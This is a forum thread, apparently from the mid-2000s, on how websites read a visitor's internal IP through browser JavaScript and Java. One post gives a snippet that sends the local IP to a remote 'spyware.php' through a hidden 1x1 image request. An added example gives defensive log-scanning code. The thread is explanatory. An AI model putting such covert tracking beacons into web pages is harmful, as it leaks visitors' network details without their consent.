# Internal IP shows outside in browser

## vcihon

I am running Shorewall on a dual-homed box and am using MASQ for my internal network.

When I went to http://www.popupcheck.com, I was surprised to find that it could correctly detect my internal IP (in red by the logon banner - if you don't see it, you don't have this problem).  It claimed I needed a patch; however, this happened with both Mozilla 1.73 and IE 6 (XPSP2).  I can repeat this on other internal computers.

I ran tcpdump on my firewall and did not see any internal addresses so it doesn't appear to be a firewall misconfiguration.  I assume it is something to do with javascript.

I'm not sure how to troubleshoot - ideas anyone?

----------

## hds

so what is the security risk here? i wouldn't mind anyone seeing my 192.x or 10.x address?

----------

## tuxmin

 *vcihon wrote:*   

> I assume it is something to do with javascript.

You assume right. The JavaScript runs on your local machine. So it can read your local IP. Disabling JavaScript is the only workaround I know.

----------

## nobspangle

I've had a quick look at this, it looks like a con to me to make you buy some of this "patch management software". I don't think the website actually knows your IP, I think this is happening internally on your PC. It's definitely nothing to do with the firewall because the so-called problem does not exist when you visit the site from a browser with javascript turned off. The private IP isn't even leaving your system, as was shown by your tcpdump.

----------

## hds

if you don't mind the german language, and have no one around you checking your system using nmap from the outside, this URL might be of interest:

http://check.lfd.niedersachsen.de/start.php

----------

## UberLord

 *nobspangle wrote:*   

> I've had a quick look at this, it looks like a con to me to make you buy some of this "patch management software". I don't think the website actually knows your IP, I think this is happening internally on your PC

Ah but it could.

What's to stop javascript from sending the internal IP to an internet resource - such as a PHP page? Not that it's going to do much good as it's an internal IP though ....

----------

## stickboy2642

Unfortunately, there is nothing short of disabling JavaScript in your browser to prevent someone getting your internal IP.  There are actually a lot of things that Javascript can pass back to the calling server, including your screen resolution and color depth of your screen.  The main thing is that this is not a problem with your firewall, but with Javascript grabbing the information directly from your browser and passing it to some script (possibly a PHP or ASP script).  The IP address that is being logged in the site's log files, etc, is the external IP of your network.  Other than annoying problems with JS on your browser, you really have nothing to worry about with regards to this.

----------

## hds

 *UberLord wrote:*   

> What's to stop javascript from sending the internal IP to an internet resource.

it doesn't. your very own javascript does show your very own IP. there is absolutely nothing to worry about.

btw: stickyboy - get your facts straight!

----------

## stickboy2642

The following code snippet will print your IP address to the screen:

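```
<script language="javascript">
// Non-IE branch: calls java.net.InetAddress from script through the browser's
// Java bridge (LiveConnect), so it needs both JavaScript and Java enabled.
if (!document.all) {
   var localIP = "" + java.net.InetAddress.getLocalHost().getHostAddress();
   document.write("Your IP address is " + localIP);
} else {
    document.write("This method does not work in Internet Explorer");
}
</script>
```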

The following snippet of code will send your local IP address to a remote file called spyware.php that is called from an image tag:

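```
// Same Java lookup as above; the address is then appended as a query-string
// parameter to a 1x1 image request, so the browser sends it to the remote host.
if (!document.all) {
   var localIP = "" + java.net.InetAddress.getLocalHost().getHostAddress();
   document.write("<img src='http://www.somedomain.com/spyware.php?userIP=" + localIP + "' border=0 width=1 height=1>");
} else {
    document.write("This method does not work in Internet Explorer");
}
```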

Note that the above code snippet does not work in IE, and will not work if you have java or javascript disabled in your browser.  I am sure that there is a method for doing the same thing in IE, but it has been a long time since I have used this for anything, and I would have to research to find it.

But the point still remains that this is not something to really be worried about.  Even if they do have your local IP address, it is very unlikely that they would be able to do anything with it if you have your firewall set up securely.  And it is most likely that they are just displaying your IP to the screen.

btw: hds - please know the facts yourself before you tell others to get their facts straight!

----------

## vcihon

Thanks for the replies.  At least I understand what is going on here . . . .

----------

## hds

all of this code will not send my local ip anywhere, sorry.

the javascript code will of course show my ip, locally to me. it will not send it to 3rd parties if the javascript is called elsewhere.

however, you are welcome to prove me wrong, and put code on a server at your desire. gimme the URL, i will execute that code and you tell me my IP.

----------

## nobspangle

it's very easy to send your local IP back to a server.

Page 1 has javascript that collects the IP and has a link to page 2

clicking the link to page 2 sends the IP to the server as POST data and page 2 uses that to display the IP address.

----------

## stickboy2642

What nobspangle said is exactly correct.  Anything that can be printed as text on the screen can just as well be printed in the context of a get or post variable, inside of a form field, or anywhere else on the page.  It could be passed to the server via a querystring parameter within a link, as a value in a form field, or it can be passed in as a querystring parameter within an image tag.  There are many web statistics packages that use this exact type of functionality to get more accurate information about a user's visit to a site (Urchin passes various parameters back to the server via GET parameters appended to the end of an image request).  Do a search on "javascript statistics tracking" and you will see hundreds of pages advertising javascript based statistics tracking packages that do this exact kind of thing.

The bottom line is that if the information can be printed on the screen, then it can be sent back to the server just as easily, and there is not much that can be done aside from disabling javascript (and/or in the case of the IP Address, disabling java).

----------
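
The query-string leak described in the post above, seen from the monitoring side, as an added example that is not part of the thread: it scans proxy log lines for requests whose decoded query parameters carry an RFC 1918 address. The log format `<client> <method> <url>`, the hosts `stats.example` and `tracker.example`, and all function names are assumptions; the sample lines are constructed.

```javascript
// True when `s` is a dotted-quad IPv4 address in 10/8, 172.16/12 or 192.168/16.
function isPrivateIPv4(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  if (!m) return false;
  const o = m.slice(1).map(Number);
  if (o.some((n) => n > 255)) return false;
  return o[0] === 10 ||
    (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
    (o[0] === 192 && o[1] === 168);
}

// Return [{param, value}] for every query parameter whose decoded value
// contains a private address. URLSearchParams does the percent-decoding.
function privateIPsInQuery(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return []; } // skip unparseable URLs
  const hits = [];
  for (const [param, value] of url.searchParams) {
    for (const cand of value.match(/\b\d{1,3}(?:\.\d{1,3}){3}\b/g) || []) {
      if (isPrivateIPv4(cand)) hits.push({ param, value: cand });
    }
  }
  return hits;
}

// Scan proxy log lines of the assumed form "<client> <method> <url>".
function scanProxyLog(lines) {
  const findings = [];
  for (const line of lines) {
    const [client, , url] = line.trim().split(/\s+/);
    if (!url) continue;
    for (const hit of privateIPsInQuery(url)) {
      findings.push({ client, url, ...hit });
    }
  }
  return findings;
}

// Constructed sample log (not captured traffic).
const SAMPLE_LOG = [
  "192.168.1.23 GET http://www.somedomain.com/spyware.php?userIP=192.168.1.23",
  "192.168.1.23 GET http://stats.example/pixel.gif?res=1024x768&depth=32",
  "192.168.1.40 GET http://tracker.example/t?d=ip%3D10.0.0.7%26v%3D2",
  "192.168.1.40 GET http://example.org/download?ver=172.32.0.1",
];

console.log(scanProxyLog(SAMPLE_LOG));
```

Dotted version strings that happen to fall in a private range will also match, so findings are leads to review rather than confirmed leaks.

----------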

## fleed

 *hds wrote:*   

> all of this code will not send my local ip anywhere, sorry.
> 
> the javascript code will of course show my ip, locally to me. it will not send it to 3rd parties if the javascript is called elsewhere.
> 
> however, you are welcome to prove me wrong, and put code on a server at your desire. gimme the URL, i will execute that code and you tell me my IP.

Do you know anything at all about javascript? It's salient you do not know much about it so you should not make such bold statements. If javascript can get your local ip it CAN send it back, just like it can send ANY information it has available back. Maybe you should start RTFM before you say silly things. And the code that stickboy created should be proof enough. Just copy/paste it into a local .html file and run it with your browser. The failure to fetch the spyware.php file, but WITH your local ip should be enough for you.

----------

